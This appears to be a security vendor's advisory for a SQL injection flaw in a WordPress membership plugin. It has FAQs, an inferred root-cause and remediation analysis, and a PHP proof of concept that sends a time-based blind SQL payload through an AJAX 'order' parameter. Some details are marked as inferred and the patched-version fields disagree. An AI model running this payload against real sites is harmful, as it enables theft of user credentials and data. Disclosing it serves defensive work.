What is CVE-2026-5073?

CVE-2026-5073 is a high-severity SQL injection vulnerability found in the ARMember Premium plugin for WordPress, affecting versions up to and including 7.3.1. It allows unauthenticated attackers to manipulate SQL queries via the ‘order’ parameter in an AJAX action, potentially exposing sensitive database information.

How does the SQL injection work?

The vulnerability arises from insufficient input validation and escaping in the ‘arm_get_directory_members()’ function. Attackers can inject malicious SQL code into the ‘order’ parameter, allowing them to execute arbitrary SQL queries and extract data from the database.

Who is affected by this vulnerability?

Any WordPress site using the ARMember Premium plugin version 7.3.1 or earlier is affected by this vulnerability. Administrators should check their plugin version and update if necessary to mitigate the risk.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the ARMember Premium plugin installed on your WordPress site. If it is 7.3.1 or lower, your site is at risk and should be updated immediately.

What is the recommended fix for this vulnerability?

The recommended fix is to update the ARMember Premium plugin to version 7.3.2 or later, which addresses the SQL injection vulnerability. Additionally, implementing proper input validation and using prepared statements in the code can further enhance security.

What does a CVSS score of 7.5 signify?

A CVSS score of 7.5 indicates a high severity level, meaning that the vulnerability poses a significant risk to the confidentiality of sensitive data. It suggests that exploitation is relatively easy and can lead to serious consequences if not addressed.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an attacker can send a specially crafted POST request to the vulnerable AJAX endpoint with a malicious payload in the ‘order’ parameter. This triggers a time delay response, confirming the vulnerability and allowing the attacker to infer information from the database.

What additional security measures can I take?

In addition to updating the plugin, consider implementing security measures such as using a web application firewall, conducting regular security audits, and monitoring for unusual activity on your site. Enforcing strong user authentication and using nonces for AJAX actions can also help mitigate risks.

Is it safe to use ARMember Premium after updating?

After updating to version 7.3.2 or later, the known SQL injection vulnerability is patched. However, it is essential to continue practicing good security hygiene, including keeping all plugins and themes up to date and regularly reviewing security configurations.

What should I do if I suspect my site has been compromised?

If you suspect that your site has been compromised due to this vulnerability, immediately update the ARMember Premium plugin and check for unauthorized access or changes. It is advisable to conduct a thorough security scan, restore from backups if necessary, and change all user passwords.

Can this vulnerability be exploited without authentication?

Yes, the vulnerability can be exploited by unauthenticated users, making it particularly dangerous. This means that attackers do not need to have any special access to the site to execute the SQL injection and extract sensitive data.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 2, 2026

CVE-2026-5073: ARMember Premium <= 7.3.1 Unauthenticated SQL Injection via 'order' Parameter PoC, Patch Analysis & Rule

CVE ID CVE-2026-5073

Plugin armember

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 7.3.1

Patched Version —

Disclosed June 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5073 (metadata-based):

This is an unauthenticated SQL injection vulnerability in the ARMember Premium plugin for WordPress, affecting versions up to and including 7.3.1. The vulnerability exists in the ‘arm_directory_paging_action’ AJAX action, specifically within the ‘order’ and ‘orderby’ parameters passed to the `arm_get_directory_members()` function. With a CVSS score of 7.5 (High) and a vector of AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N, this vulnerability allows remote attackers to extract sensitive information from the database without authentication.

Root Cause: The vulnerability stems from insufficient input escaping and lack of prepared SQL statements in the `arm_get_directory_members()` function. Based on the CWE-89 classification and the description, Atomic Edge analysis infers that the ‘order’ and ‘orderby’ parameters are directly concatenated into an SQL query without proper sanitization or parameterized queries. The AJAX handler ‘arm_directory_paging_action’ likely registers with WordPress via `wp_ajax_` and `wp_ajax_nopriv_` hooks, making it accessible to unauthenticated users. The plugin fails to use `$wpdb->prepare()` or similar escaping functions on these user-supplied values, allowing an attacker to break out of the intended SQL syntax.

Exploitation: The attack vector is the WordPress AJAX endpoint at `/wp-admin/admin-ajax.php`. An attacker sends a POST request with the `action` parameter set to `arm_directory_paging_action` and the `order` parameter containing a malicious SQL payload. For example, a classic blind SQL injection payload like `(SELECT * FROM (SELECT(SLEEP(5)))a)` can be injected into the ‘order’ parameter to trigger time-based responses. The lack of nonce verification or authentication checks means any unauthenticated user can trigger the vulnerable function. The attacker can then extract database contents such as WordPress user credentials (usernames and password hashes), options, and other sensitive data by observing response timing or error messages.

Remediation: The patched version 7.3.2 likely implements proper input validation and parameterized queries. Atomic Edge analysis recommends using `$wpdb->prepare()` with placeholder substitution for the ‘order’ parameter, strict whitelisting of allowable sort directions (‘ASC’/’DESC’), and sanitization of the ‘orderby’ parameter against a predefined list of valid column names. The fix should also apply prepared statements consistently in the `arm_get_directory_members()` function to prevent any future injection vectors. Additionally, implementing a nonce check for the AJAX action would prevent unauthenticated exploitation, though this may change intended functionality.

Impact: Successful exploitation yields high confidentiality impact with no integrity or availability loss. An attacker can exfiltrate the entire WordPress database, including user credentials (password hashes), user emails, session tokens, private post content, and plugin configuration data. This data can be used for credential stuffing attacks, identity theft, or further targeted attacks on site administrators. The unauthenticated nature of this vulnerability reduces the barrier for attack, making mass exploitation possible by automated scripts.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-5073 - ARMember Premium <= 7.3.1 - Unauthenticated SQL Injection via 'order' Parameter

// Configurable target URL (adjust path as needed)
$target_url = 'http://example.com/wp-admin/admin-ajax.php';

// AJAX action name (inferred from plugin slug and description)
$action = 'arm_directory_paging_action';

// Test payload: sleep-based blind SQL injection to confirm vulnerability
// This payload attempts to inject a time delay into the 'order' parameter
$payload = "(SELECT * FROM (SELECT(SLEEP(5)))a)";

// Request parameters
$post_data = array(
    'action'  => $action,
    'order'   => $payload,
    'orderby' => 'user_login'
);

// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

// Execute request and measure response time
$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
$duration = $end_time - $start_time;

// Check for errors or timeout
if (curl_errno($ch)) {
    echo 'cURL error: ' . curl_error($ch) . PHP_EOL;
} else {
    echo "Response time: " . round($duration, 2) . " seconds" . PHP_EOL;
    if ($duration >= 5) {
        echo "[+] Vulnerability confirmed! SQL injection successful (sleep 5 seconds detected)." . PHP_EOL;
    } else {
        echo "[-] No time delay detected. The target may be patched or the payload may not work as expected." . PHP_EOL;
    }
    // Optionally dump response for debugging
    // echo "Response: " . substr($response, 0, 500) . PHP_EOL;
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-5073?
Understanding the vulnerability
CVE-2026-5073 is a high-severity SQL injection vulnerability found in the ARMember Premium plugin for WordPress, affecting versions up to and including 7.3.1. It allows unauthenticated attackers to manipulate SQL queries via the ‘order’ parameter in an AJAX action, potentially exposing sensitive database information.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability arises from insufficient input validation and escaping in the ‘arm_get_directory_members()’ function. Attackers can inject malicious SQL code into the ‘order’ parameter, allowing them to execute arbitrary SQL queries and extract data from the database.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the ARMember Premium plugin version 7.3.1 or earlier is affected by this vulnerability. Administrators should check their plugin version and update if necessary to mitigate the risk.
How can I check if my site is vulnerable?
Version verification steps
To determine if your site is vulnerable, check the version of the ARMember Premium plugin installed on your WordPress site. If it is 7.3.1 or lower, your site is at risk and should be updated immediately.
What is the recommended fix for this vulnerability?
Updating the plugin
The recommended fix is to update the ARMember Premium plugin to version 7.3.2 or later, which addresses the SQL injection vulnerability. Additionally, implementing proper input validation and using prepared statements in the code can further enhance security.
What does a CVSS score of 7.5 signify?
Understanding severity ratings
A CVSS score of 7.5 indicates a high severity level, meaning that the vulnerability poses a significant risk to the confidentiality of sensitive data. It suggests that exploitation is relatively easy and can lead to serious consequences if not addressed.
What are the practical risks of this vulnerability?
Potential impacts on the site
Exploitation of this vulnerability can lead to unauthorized access to sensitive information in the WordPress database, including user credentials and private content. This can facilitate further attacks, such as credential stuffing or identity theft.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept provided shows how an attacker can send a specially crafted POST request to the vulnerable AJAX endpoint with a malicious payload in the ‘order’ parameter. This triggers a time delay response, confirming the vulnerability and allowing the attacker to infer information from the database.
What additional security measures can I take?
Enhancing site security
In addition to updating the plugin, consider implementing security measures such as using a web application firewall, conducting regular security audits, and monitoring for unusual activity on your site. Enforcing strong user authentication and using nonces for AJAX actions can also help mitigate risks.
Is it safe to use ARMember Premium after updating?
Post-update considerations
After updating to version 7.3.2 or later, the known SQL injection vulnerability is patched. However, it is essential to continue practicing good security hygiene, including keeping all plugins and themes up to date and regularly reviewing security configurations.
What should I do if I suspect my site has been compromised?
Response steps for security incidents
If you suspect that your site has been compromised due to this vulnerability, immediately update the ARMember Premium plugin and check for unauthorized access or changes. It is advisable to conduct a thorough security scan, restore from backups if necessary, and change all user passwords.
Can this vulnerability be exploited without authentication?
Access requirements for exploitation
Yes, the vulnerability can be exploited by unauthenticated users, making it particularly dangerous. This means that attackers do not need to have any special access to the site to execute the SQL injection and extract sensitive data.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started